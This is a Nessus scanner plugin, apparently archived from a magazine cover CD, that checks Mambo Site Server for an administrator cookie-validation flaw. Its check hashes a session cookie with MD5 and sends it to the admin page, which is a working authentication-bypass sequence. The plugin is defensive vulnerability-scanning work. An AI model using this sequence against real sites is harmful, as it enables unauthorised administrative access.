home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / modules / nessus-2.2.8.mo / usr / lib / nessus / plugins / mambo.nasl < prev    next >
Text File  |  2005-01-14  |  2KB  |  76 lines

  1.  
  2. #
  3. # This script was written by Renaud Deraison <deraison@cvs.nessus.org>
  4. #
  5. # See the Nessus Scripts License for details
  6. #
  7.  
  8. if(description)
  9. {
  10.  script_id(11361);
  11.  script_bugtraq_id(6926);
  12.  script_version ("$Revision: 1.4 $");
  13.  
  14.  name["english"] = "Mambo Site Server Cookie Validation";
  15.  script_name(english:name["english"]);
  16.  
  17.  desc["english"] = "
  18. The remote Mambo Site Server improperly validates the cookies
  19. that are sent back by the user.
  20.  
  21. As a result, a user may impersonate the administrator by
  22. using the MD5 value of a received cookie and modify
  23. the remote server.
  24.  
  25. Solution : Upgrade to Mambo 4.0.12 RC3 or newer
  26. Risk factor : High";
  27.  
  28.  
  29.  
  30.  
  31.  script_description(english:desc["english"]);
  32.  
  33.  summary["english"] = "Checks for the presence of Mambo's flaw";
  34.  
  35.  script_summary(english:summary["english"]);
  36.  
  37.  script_category(ACT_GATHER_INFO);
  38.  
  39.  
  40.  script_copyright(english:"This script is Copyright (C) 2003 Renaud Deraison",
  41.         francais:"Ce script est Copyright (C) 2003 Renaud Deraison");
  42.  family["english"] = "CGI abuses";
  43.  family["francais"] = "Abus de CGI";
  44.  script_family(english:family["english"], francais:family["francais"]);
  45.  script_dependencie("find_service.nes", "http_version.nasl");
  46.  script_require_ports("Services/www", 80);
  47.  exit(0);
  48. }
  49.  
  50.  
  51. include("http_func.inc");
  52. include("http_keepalive.inc");
  53.  
  54. port = get_http_port(default:80);
  55.  
  56. if(!get_port_state(port))exit(0);
  57. if(!can_host_php(port:port)) exit(0);
  58.  
  59.  
  60. foreach dir (make_list(cgi_dirs(),  "/mambo"))
  61. {
  62.  req = http_get(item:string(dir, "/index.php?option=logout"), port:port);
  63.  res = http_keepalive_send_recv(port:port, data:req);
  64.  if(res == NULL) exit(0);
  65.  
  66.  cookie = egrep(pattern:"^Set-Cookie.*sessioncookie", string:res, icase:TRUE);
  67.  if(cookie)
  68.  {
  69.   cookie -= string("\r\n");
  70.   id = ereg_replace(pattern:".*=(.*)", string:cookie, replace:"\1");
  71.   req = http_get(item:string(dir, "/administrator/index2.php?session_id=", hexstr(MD5(id))), port:port);
  72.   res = http_keepalive_send_recv(port:port, data:req);
  73.   if("Mambo Open Source - Administration" >< res)security_hole(port);
  74.  }
  75. }
  76.